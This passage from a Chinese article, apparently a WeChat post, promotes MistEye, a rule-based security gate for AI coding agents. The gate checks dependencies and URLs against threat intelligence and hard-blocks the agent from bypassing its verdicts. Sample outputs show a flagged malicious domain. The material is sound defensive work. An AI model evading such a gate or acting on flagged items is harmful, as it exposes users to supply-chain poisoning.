normal;">巡检主要做三件事：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1）检查版本更新；</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2）扫描已安装 Skill/MCP 的依赖声明，优先使用 package:* 供应链直查，再对提取的 url/domain/email/hash 执行 MistEye 检测；</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3）汇总结果集中展示。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 主要目的是将&#34;手动打补丁&#34;的安全检查变成每日自动化的运营动作，更早发现供应链投毒、恶意外链以及因规则失效导致的漏检。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">之后，每次 AI 代理执行 pip install、npm install 等依赖安装命令或访问外部 URL 时，MistEye 会自动触发前置检测（输出格式见第七章实战场景）。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages wxw-img" data-ratio="0.6887115165336374" data-type="png" data-w="877" height="291" style="margin-left: 0px;margin-top: 0px;" width="421" data-imgfileid="100021244" src="https://wechat2rss.xlab.app/img-proxy/?k=11ce5df5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCJA9sHJbRHOoPAO25zFjtwOjDlPk6ZOa5o741FicSQMeS65IvkMmR2mfHKO88bkvsNW5ibXzJYLUIvnYFZkjMoyQQIjNeibNXqn8Y%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></b></p><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 4pt;"><b data-pm-slice="0 0 []"><span leaf="" style="white-space: pre-wrap;font-size: 17pt;font-family: Arial, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">六、设计特点</span></span></b></h2><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">6.1 纯规则驱动，零脚本依赖</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye Security Gate 不包含任何可执行脚本（无 .sh、无二进制文件、无可执行代码）。所有的检测逻辑均以 Skill 规则文件(SKILL.md) 的形式定义，由 AI 代理在运行时解析执行。这种设计：</span></span></b></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">消除了 Skill 本身的供应链风险</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> — 用户可以直接审查 SKILL.md 的全部内容。</span></span></b></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">最大化了跨平台兼容性 — 任何支持 Skill 规范的 AI 代理均可使用。</span></span></b></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">降低了维护成本 — 规则更新只需替换 SKILL.md 文件。</span></span></b></p></li></ul><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">6.2 零信任前置</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye 默认不信任任何依赖和任何域名。即使开发者凭经验认为某个包&#34;应该安全&#34;，也需要通过 API 检测验证。零信任原则贯穿整个执行链路。</span></span></b></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">6.3 硬阻断机制</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">当检测到风险时，MistEye </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">硬阻断</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">操作——不允许 AI 代理绕过或忽略检测结果。这意味着：</span></span></b></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">不存在&#34;仅提示但放行&#34;的灰色地带。</span></span></b></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">&#34;检测失败&#34;被视为&#34;不安全&#34;，执行阻断而非放行。</span></span></b></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">API 不可用时，系统宁可阻断也不盲放。</span></span></b></p></li></ul><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">6.4 开放性</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye 的规则文件、调度器模板、API 接口文档全部开源，用户可自行审计、定制或集成到自有安全体系中。</span></span></b></p><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 4pt;"><b data-pm-slice="0 0 []"><span leaf="" style="white-space: pre-wrap;font-size: 17pt;font-family: Arial, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">七、实战场景：它在你日常工作流中长什么样</span></span></b></h2><b style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">上面的技术描述可能让你觉得&#34;又一套安全方案&#34;，我们用几个日常工作会真实碰到的场景，看看 MistEye 到底做了什么。</span></span></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">场景一：AI 让你装一个没见过的包</span></span></b></p><b data-pm-slice="0 0 []"><p dir="ltr" style="line-height:1.38;margin-top:9pt;margin-bottom:9pt;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">你正在用 Claude Code 写一个数据处理脚本，AI 代理建议：pip install data-cleaning-toolkit。你没用过这个包，它可靠吗？</span></span></p></b><b data-pm-slice="0 0 []"><p dir="ltr" style="line-height:1.38;margin-top:9pt;margin-bottom:9pt;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在 MistEye 开启的情况下，AI 代理不会直接执行安装，而是先输出检测结果：</span></span></p></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">🔍 威胁情报详情</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检测命中 (0 项):</span></span></b></p><b style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 目标: urllib3==2.2.1 → package:pypi</span></span></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 状态: safe=true, matches=0</span></span></b></b></p><b style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 情报来源: misteye_internal</span></span></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">✅ 该依赖未命中恶意标记，安装可继续（请自行复核）。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">整个过程对你透明，你看到了检测证据，然后安装照常进行。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">你没有多做一个操作，但少了一个隐患。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">场景二：同事发来一个链接让你&#34;帮看一下&#34;</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">你在和同事讨论问题时，对方发来一个链接让你帮忙看看。你把链接贴给了 AI 代理。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye 会拦截在这个请求之前，先对域名和 URL 做威胁情报检测：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">🚨 威胁情报详情</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检测命中 (1 项):</span></span></b></p><b style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 域名: zahnarztpraxis-rogal.ch</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 严重程度: High (高危)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 置信度: 100%</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 首次发现: 2026-05-07 14:22 UTC</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><br/></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> - 过期时间: 2026-08-05</span></span><span leaf="" style="text-indent: 0px;line-height: 